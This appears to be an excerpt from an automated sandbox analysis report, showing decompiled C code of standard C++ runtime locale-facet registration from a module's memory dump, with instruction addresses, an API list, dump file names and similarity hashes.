																																																			_push(_t841 - 0x10);
																																																			__eflags = E6E19B055(_t584, _t791, _t813) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E161CB5(__eflags);
																																																				asm("int3");
																																																				E6E1A9DBF(0x6e1ec3ec, _t584, _t791, _t813, 8);
																																																				E6E18F2A5(_t841 - 0x14, 0);
																																																				_t814 =  *0x6e221718; // 0x0
																																																				 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																																				 *(_t841 - 0x10) = _t814;
																																																				_t792 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216c4, _t791, _t814));
																																																				__eflags = _t792;
																																																				if(_t792 != 0) {
																																																					L117:
																																																					E6E18F30C(_t841 - 0x14);
																																																					return E6E1A9D88(_t792);
																																																				} else {
																																																					__eflags = _t814;
																																																					if(_t814 == 0) {
																																																						_push( *((intOrPtr*)(_t841 + 8)));
																																																						_push(_t841 - 0x10);
																																																						__eflags = E6E19B0BD(_t584, _t792, _t814) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E161CB5(__eflags);
																																																							asm("int3");
																																																							E6E1A9DBF(0x6e1ec3ec, _t584, _t792, _t814, 8);
																																																							E6E18F2A5(_t841 - 0x14, 0);
																																																							_t815 =  *0x6e221734; // 0x0
																																																							 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																																							 *(_t841 - 0x10) = _t815;
																																																							_t793 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216e0, _t792, _t815));
																																																							__eflags = _t793;
																																																							if(_t793 != 0) {
																																																								L124:
																																																								E6E18F30C(_t841 - 0x14);
																																																								return E6E1A9D88(_t793);
																																																							} else {
																																																								__eflags = _t815;
																																																								if(_t815 == 0) {
																																																									_push( *((intOrPtr*)(_t841 + 8)));
																																																									_push(_t841 - 0x10);
																																																									__eflags = E6E19B138(_t584, _t793, _t815) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E161CB5(__eflags);
																																																										asm("int3");
																																																										E6E1A9DBF(0x6e1ec3ec, _t584, _t793, _t815, 8);
																																																										E6E18F2A5(_t841 - 0x14, 0);
																																																										_t816 =  *0x6e221704; // 0x0
																																																										 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																																										 *(_t841 - 0x10) = _t816;
																																																										_t794 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216b8, _t793, _t816));
																																																										__eflags = _t794;
																																																										if(_t794 != 0) {
																																																											L131:
																																																											E6E18F30C(_t841 - 0x14);
																																																											return E6E1A9D88(_t794);
																																																										} else {
																																																											__eflags = _t816;
																																																											if(_t816 == 0) {
																																																												_push( *((intOrPtr*)(_t841 + 8)));
																																																												_push(_t841 - 0x10);
																																																												__eflags = E6E19B1A4(_t584, _t794, _t816) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E161CB5(__eflags);
																																																													asm("int3");
																																																													E6E1A9DBF(0x6e1ec3ec, _t584, _t794, _t816, 8);
																																																													E6E18F2A5(_t841 - 0x14, 0);
																																																													_t817 =  *0x6e221738; // 0x0
																																																													 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																																													 *(_t841 - 0x10) = _t817;
																																																													_t795 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e2216e4, _t794, _t817));
																																																													__eflags = _t795;
																																																													if(_t795 != 0) {
																																																														L138:
																																																														E6E18F30C(_t841 - 0x14);
																																																														return E6E1A9D88(_t795);
																																																													} else {
																																																														__eflags = _t817;
																																																														if(_t817 == 0) {
																																																															_push( *((intOrPtr*)(_t841 + 8)));
																																																															_push(_t841 - 0x10);
																																																															__eflags = E6E19B210(_t584, _t795, _t817) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6E161CB5(__eflags);
																																																																asm("int3");
																																																																E6E1A9DBF(0x6e1ec3ec, _t584, _t795, _t817, 8);
																																																																E6E18F2A5(_t841 - 0x14, 0);
																																																																_t818 =  *0x6e221708; // 0x0
																																																																 *(_t841 - 4) =  *(_t841 - 4) & 0x00000000;
																																																																 *(_t841 - 0x10) = _t818;
																																																																_t796 = E6E162171( *((intOrPtr*)(_t841 + 8)), E6E161F29(_t584, 0x6e221698, _t795, _t818));
																																																																__eflags = _t796;
																																																																if(_t796 != 0) {
																																																																	L145:
																																																																	E6E18F30C(_t841 - 0x14);
																																																																	return E6E1A9D88(_t796);
																																																																} else {
																																																																	__eflags = _t818;
																																																																	if(_t818 == 0) {
																																																																		_push( *((intOrPtr*)(_t841 + 8)));
																																																																		_push(_t841 - 0x10);
																																																																		_t491 = E6E19B284(_t584, _t796, _t818);
																																																																		_pop(_t710);
																																																																		__eflags = _t491 - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			E6E161CB5(__eflags);
																																																																			asm("int3");
																																																																			E6E1A9DBF(0x6e1ecb1a, _t584, _t796, _t818, 4);
																																																																			_t819 = _t710;
																																																																			 *(_t841 - 0x10) = _t819;
																																																																			 *((intOrPtr*)(_t819 + 4)) =  *((intOrPtr*)(_t841 + 0xc));
																																																																			_push( *((intOrPtr*)(_t841 + 0x14)));
																																																																			_t259 = _t841 - 4;
																																																																			 *_t259 =  *(_t841 - 4) & 0x00000000;
																																																																			__eflags =  *_t259;
																																																																			 *_t819 = 0x6e1f225c;
																																																																			 *((char*)(_t819 + 0x28)) =  *((intOrPtr*)(_t841 + 0x10));
																																																																			E6E19F3D8(_t584, _t710, _t774, _t796, _t819,  *_t259);
																																																																			return E6E1A9D88(_t819,  *((intOrPtr*)(_t841 + 8)));
																																																																		} else {
																																																																			_t796 =  *(_t841 - 0x10);
																																																																			 *(_t841 - 0x10) = _t796;
																																																																			 *(_t841 - 4) = 1;
																																																																			E6E1911C1(__eflags, _t796);
																																																																			 *0x6e1ee1b4();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t796 + 4))))();
																																																																			 *0x6e221708 = _t796;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t796 = _t818;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t795 =  *(_t841 - 0x10);
																																																																 *(_t841 - 0x10) = _t795;
																																																																 *(_t841 - 4) = 1;
																																																																E6E1911C1(__eflags, _t795);
																																																																 *0x6e1ee1b4();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t795 + 4))))();
																																																																 *0x6e221738 = _t795;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t795 = _t817;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t794 =  *(_t841 - 0x10);
																																																													 *(_t841 - 0x10) = _t794;
																																																													 *(_t841 - 4) = 1;
																																																													E6E1911C1(__eflags, _t794);
																																																													 *0x6e1ee1b4();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t794 + 4))))();
																																																													 *0x6e221704 = _t794;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t794 = _t816;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t793 =  *(_t841 - 0x10);
																																																										 *(_t841 - 0x10) = _t793;
																																																										 *(_t841 - 4) = 1;
																																																										E6E1911C1(__eflags, _t793);
																																																										 *0x6e1ee1b4();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t793 + 4))))();
																																																										 *0x6e221734 = _t793;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t793 = _t815;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t792 =  *(_t841 - 0x10);
																																																							 *(_t841 - 0x10) = _t792;
																																																							 *(_t841 - 4) = 1;
																																																							E6E1911C1(__eflags, _t792);
																																																							 *0x6e1ee1b4();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t792 + 4))))();
																																																							 *0x6e221718 = _t792;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t792 = _t814;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t791 =  *(_t841 - 0x10);
																																																				 *(_t841 - 0x10) = _t791;
																																																				 *(_t841 - 4) = 1;
																																																				E6E1911C1(__eflags, _t791);
																																																				 *0x6e1ee1b4();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t791 + 4))))();
																																																				 *0x6e221714 = _t791;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t791 = _t813;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t790 =  *(_t841 - 0x10);
																																																	 *(_t841 - 0x10) = _t790;
																																																	 *(_t841 - 4) = 1;
																																																	E6E1911C1(__eflags, _t790);
																																																	 *0x6e1ee1b4();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t790 + 4))))();
																																																	 *0x6e2216e8 = _t790;
																																																	goto L103;
																																																}
																																															} else {
																																																_t790 = _t812;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t789 =  *(_t841 - 0x10);
																																														 *(_t841 - 0x10) = _t789;
																																														 *(_t841 - 4) = 1;
																																														E6E1911C1(__eflags, _t789);
																																														 *0x6e1ee1b4();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t789 + 4))))();
																																														 *0x6e221710 = _t789;
																																														goto L96;
																																													}
																																												} else {
																																													_t789 = _t811;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t788 =  *(_t841 - 0x10);
																																											 *(_t841 - 0x10) = _t788;
																																											 *(_t841 - 4) = 1;
																																											E6E1911C1(__eflags, _t788);
																																											 *0x6e1ee1b4();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t788 + 4))))();
																																											 *0x6e2216fc = _t788;
																																											goto L89;
																																										}
																																									} else {
																																										_t788 = _t810;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t787 =  *(_t841 - 0x10);
																																								 *(_t841 - 0x10) = _t787;
																																								 *(_t841 - 4) = 1;
																																								E6E1911C1(__eflags, _t787);
																																								 *0x6e1ee1b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t787 + 4))))();
																																								 *0x6e221700 = _t787;
																																								goto L82;
																																							}
																																						} else {
																																							_t787 = _t809;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t786 =  *(_t841 - 0x10);
																																					 *(_t841 - 0x10) = _t786;
																																					 *(_t841 - 4) = 1;
																																					E6E1911C1(__eflags, _t786);
																																					 *0x6e1ee1b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t786 + 4))))();
																																					 *0x6e22172c = _t786;
																																					goto L75;
																																				}
																																			} else {
																																				_t786 = _t808;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t785 =  *(_t841 - 0x10);
																																		 *(_t841 - 0x10) = _t785;
																																		 *(_t841 - 4) = 1;
																																		E6E1911C1(__eflags, _t785);
																																		 *0x6e1ee1b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t785 + 4))))();
																																		 *0x6e221730 = _t785;
																																		goto L68;
																																	}
																																} else {
																																	_t785 = _t807;
																																	goto L68;
																																}
																															}
																														} else {
																															_t784 =  *(_t841 - 0x10);
																															 *(_t841 - 0x10) = _t784;
																															 *(_t841 - 4) = 1;
																															E6E1911C1(__eflags, _t784);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t784 + 4))))();
																															 *0x6e2216f8 = _t784;
																															goto L61;
																														}
																													} else {
																														_t784 = _t806;
																														goto L61;
																													}
																												}
																											} else {
																												_t783 =  *(_t841 - 0x10);
																												 *(_t841 - 0x10) = _t783;
																												 *(_t841 - 4) = 1;
																												E6E1911C1(__eflags, _t783);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t783 + 4))))();
																												 *0x6e221728 = _t783;
																												goto L54;
																											}
																										} else {
																											_t783 = _t805;
																											goto L54;
																										}
																									}
																								} else {
																									_t782 =  *(_t841 - 0x10);
																									 *(_t841 - 0x10) = _t782;
																									 *(_t841 - 4) = 1;
																									E6E1911C1(__eflags, _t782);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t782 + 4))))();
																									 *0x6e2216f4 = _t782;
																									goto L47;
																								}
																							} else {
																								_t782 = _t804;
																								goto L47;
																							}
																						}
																					} else {
																						_t781 =  *(_t841 - 0x10);
																						 *(_t841 - 0x10) = _t781;
																						 *(_t841 - 4) = 1;
																						E6E1911C1(__eflags, _t781);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t781 + 4))))();
																						 *0x6e221724 = _t781;
																						goto L40;
																					}
																				} else {
																					_t781 = _t803;
																					goto L40;
																				}
																			}
																		} else {
																			_t780 =  *(_t841 - 0x10);
																			 *(_t841 - 0x10) = _t780;
																			 *(_t841 - 4) = 1;
																			E6E1911C1(__eflags, _t780);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t780 + 4))))();
																			 *0x6e2216f0 = _t780;
																			goto L33;
																		}
																	} else {
																		_t780 = _t802;
																		goto L33;
																	}
																}
															} else {
																_t779 =  *(_t841 - 0x10);
																 *(_t841 - 0x10) = _t779;
																 *(_t841 - 4) = 1;
																E6E1911C1(__eflags, _t779);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t779 + 4))))();
																 *0x6e221720 = _t779;
																goto L26;
															}
														} else {
															_t779 = _t801;
															goto L26;
														}
													}
												} else {
													_t778 =  *(_t841 - 0x10);
													 *(_t841 - 0x10) = _t778;
													 *(_t841 - 4) = 1;
													E6E1911C1(__eflags, _t778);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t778 + 4))))();
													 *0x6e22170c = _t778;
													goto L19;
												}
											} else {
												_t778 = _t800;
												goto L19;
											}
										}
									} else {
										_t777 =  *(_t841 - 0x10);
										 *(_t841 - 0x10) = _t777;
										 *(_t841 - 4) = 1;
										E6E1911C1(__eflags, _t777);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t777 + 4))))();
										 *0x6e2216ec = _t777;
										goto L12;
									}
								} else {
									_t777 = _t799;
									goto L12;
								}
							}
						} else {
							_t776 =  *(_t841 - 0x10);
							 *(_t841 - 0x10) = _t776;
							 *(_t841 - 4) = 1;
							E6E1911C1(__eflags, _t776);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t776 + 4))))();
							 *0x6e22171c = _t776;
							goto L5;
						}
					} else {
						_t776 = _t798;
						goto L5;
					}
				}
			}

0x6e198d0d
0x6e198d0d
0x6e198d14
0x6e198d1e
0x6e198d23
0x6e198d2e
0x6e198d32
0x6e198d3e
0x6e198d43
0x6e198d47
0x6e198d8c
0x6e198d8f
0x6e198d9b
0x6e198d49
0x6e198d4b
0x6e198d51
0x6e198d57
0x6e198d5f
0x6e198d62
0x6e198d9c
0x6e198da1
0x6e198da9
0x6e198db3
0x6e198db8
0x6e198dc3
0x6e198dc7
0x6e198dd8
0x6e198dda
0x6e198ddc
0x6e198e21
0x6e198e24
0x6e198e30
0x6e198dde
0x6e198dde
0x6e198de0
0x6e198de6
0x6e198dec
0x6e198df4
0x6e198df7
0x6e198e31
0x6e198e36
0x6e198e3e
0x6e198e48
0x6e198e4d
0x6e198e58
0x6e198e5c
0x6e198e6d
0x6e198e6f
0x6e198e71
0x6e198eb6
0x6e198eb9
0x6e198ec5
0x6e198e73
0x6e198e73
0x6e198e75
0x6e198e7b
0x6e198e81
0x6e198e89
0x6e198e8c
0x6e198ec6
0x6e198ecb
0x6e198ed3
0x6e198edd
0x6e198ee2
0x6e198eed
0x6e198ef1
0x6e198f02
0x6e198f04
0x6e198f06
0x6e198f4b
0x6e198f4e
0x6e198f5a
0x6e198f08
0x6e198f08
0x6e198f0a
0x6e198f10
0x6e198f16
0x6e198f1e
0x6e198f21
0x6e198f5b
0x6e198f60
0x6e198f68
0x6e198f72
0x6e198f77
0x6e198f82
0x6e198f86
0x6e198f97
0x6e198f99
0x6e198f9b
0x6e198fe0
0x6e198fe3
0x6e198fef
0x6e198f9d
0x6e198f9d
0x6e198f9f
0x6e198fa5
0x6e198fab
0x6e198fb3
0x6e198fb6
0x6e198ff0
0x6e198ff5
0x6e198ffd
0x6e199007
0x6e19900c
0x6e199017
0x6e19901b
0x6e19902c
0x6e19902e
0x6e199030
0x6e199075
0x6e199078
0x6e199084
0x6e199032
0x6e199032
0x6e199034
0x6e19903a
0x6e199040
0x6e199048
0x6e19904b
0x6e199085
0x6e19908a
0x6e199092
0x6e19909c
0x6e1990a1
0x6e1990ac
0x6e1990b0
0x6e1990c1
0x6e1990c3
0x6e1990c5
0x6e19910a
0x6e19910d
0x6e199119
0x6e1990c7
0x6e1990c7
0x6e1990c9
0x6e1990cf
0x6e1990d5
0x6e1990dd
0x6e1990e0
0x6e19911a
0x6e19911f
0x6e199127
0x6e199131
0x6e199136
0x6e199141
0x6e199145
0x6e199156
0x6e199158
0x6e19915a
0x6e19919f
0x6e1991a2
0x6e1991ae
0x6e19915c
0x6e19915c
0x6e19915e
0x6e199164
0x6e19916a
0x6e199172
0x6e199175
0x6e1991af
0x6e1991b4
0x6e1991bc
0x6e1991c6
0x6e1991cb
0x6e1991d6
0x6e1991da
0x6e1991eb
0x6e1991ed
0x6e1991ef
0x6e199234
0x6e199237
0x6e199243
0x6e1991f1
0x6e1991f1
0x6e1991f3
0x6e1991f9
0x6e1991ff
0x6e199207
0x6e19920a
0x6e199244
0x6e199249
0x6e199251
0x6e19925b
0x6e199260
0x6e19926b
0x6e19926f
0x6e199280
0x6e199282
0x6e199284
0x6e1992c9
0x6e1992cc
0x6e1992d8
0x6e199286
0x6e199286
0x6e199288
0x6e19928e
0x6e199294
0x6e19929c
0x6e19929f
0x6e1992d9
0x6e1992de
0x6e1992e6
0x6e1992f0
0x6e1992f5
0x6e199300
0x6e199304
0x6e199315
0x6e199317
0x6e199319
0x6e19935e
0x6e199361
0x6e19936d
0x6e19931b
0x6e19931b
0x6e19931d
0x6e199323
0x6e199329
0x6e199331
0x6e199334
0x6e19936e
0x6e199373
0x6e19937b
0x6e199385
0x6e19938a
0x6e199395
0x6e199399
0x6e1993aa
0x6e1993ac
0x6e1993ae
0x6e1993f3
0x6e1993f6
0x6e199402
0x6e1993b0
0x6e1993b0
0x6e1993b2
0x6e1993b8
0x6e1993be
0x6e1993c6
0x6e1993c9
0x6e199403
0x6e199408
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943f
0x6e199441
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288
0x6e19920c
0x6e19920c
0x6e19920f
0x6e199213
0x6e199217
0x6e199224
0x6e19922c
0x6e19922e
0x00000000
0x6e19922e
0x6e1991f5
0x6e1991f5
0x00000000
0x6e1991f5
0x6e1991f3
0x6e199177
0x6e199177
0x6e19917a
0x6e19917e
0x6e199182
0x6e19918f
0x6e199197
0x6e199199
0x00000000
0x6e199199
0x6e199160
0x6e199160
0x00000000
0x6e199160
0x6e19915e
0x6e1990e2
0x6e1990e2
0x6e1990e5
0x6e1990e9
0x6e1990ed
0x6e1990fa
0x6e199102
0x6e199104
0x00000000
0x6e199104
0x6e1990cb
0x6e1990cb
0x00000000
0x6e1990cb
0x6e1990c9
0x6e19904d
0x6e19904d
0x6e199050
0x6e199054
0x6e199058
0x6e199065
0x6e19906d
0x6e19906f
0x00000000
0x6e19906f
0x6e199036
0x6e199036
0x00000000
0x6e199036
0x6e199034
0x6e198fb8
0x6e198fb8
0x6e198fbb
0x6e198fbf
0x6e198fc3
0x6e198fd0
0x6e198fd8
0x6e198fda
0x00000000
0x6e198fda
0x6e198fa1
0x6e198fa1
0x00000000
0x6e198fa1
0x6e198f9f
0x6e198f23
0x6e198f23
0x6e198f26
0x6e198f2a
0x6e198f2e
0x6e198f3b
0x6e198f43
0x6e198f45
0x00000000
0x6e198f45
0x6e198f0c
0x6e198f0c
0x00000000
0x6e198f0c
0x6e198f0a
0x6e198e8e
0x6e198e8e
0x6e198e91
0x6e198e95
0x6e198e99
0x6e198ea6
0x6e198eae
0x6e198eb0
0x00000000
0x6e198eb0
0x6e198e77
0x6e198e77
0x00000000
0x6e198e77
0x6e198e75
0x6e198df9
0x6e198df9
0x6e198dfc
0x6e198e00
0x6e198e04
0x6e198e11
0x6e198e19
0x6e198e1b
0x00000000
0x6e198e1b
0x6e198de2
0x6e198de2
0x00000000
0x6e198de2
0x6e198de0
0x6e198d64
0x6e198d64
0x6e198d67
0x6e198d6b
0x6e198d6f
0x6e198d7c
0x6e198d84
0x6e198d86
0x00000000
0x6e198d86
0x6e198d4d
0x6e198d4d
0x00000000
0x6e198d4d
0x6e198d4b

APIs

__EH_prolog3.LIBCMT ref: 6E198D14
std::_Lockit::_Lockit.LIBCPMT ref: 6E198D1E

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

collate.LIBCPMT ref: 6E198D58
std::_Facet_Register.LIBCPMT ref: 6E198D6F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198D8F
Concurrency::cancel_current_task.LIBCPMT ref: 6E198D9C

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
String ID:
API String ID: 854050597-0
Opcode ID: 5f7fedb943f4c0cad98c315f9fd8dae7e7a3d405553f5db52f0b8d0345870dcb
Instruction ID: fc9f8dec7159ce59476065ed2a94e9b6416dca88f47aba3c0eb6a2ac7f9ac253
Opcode Fuzzy Hash: 5f7fedb943f4c0cad98c315f9fd8dae7e7a3d405553f5db52f0b8d0345870dcb
Instruction Fuzzy Hash: 0701D635900219DFCF05DBE4C8546FE77B9AF94714F244809E815AB290CF309AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198DA2, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E198DA2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t254;
				void* _t468;
				signed int _t677;
				void* _t738;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				signed int _t753;
				signed int _t754;
				signed int _t755;
				signed int _t756;
				signed int _t757;
				signed int _t758;
				signed int _t759;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				void* _t802;

				_t738 = __edx;
				_t557 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t802 - 0x14, 0);
				_t761 =  *0x6e2216ec; // 0x0
				 *(_t802 - 4) =  *(_t802 - 4) & 0x00000000;
				 *(_t802 - 0x10) = _t761;
				_t254 = E6E162171( *((intOrPtr*)(_t802 + 8)), E6E161F29(__ebx, 0x6e2216a0, __edi, _t761));
				_t740 = _t254;
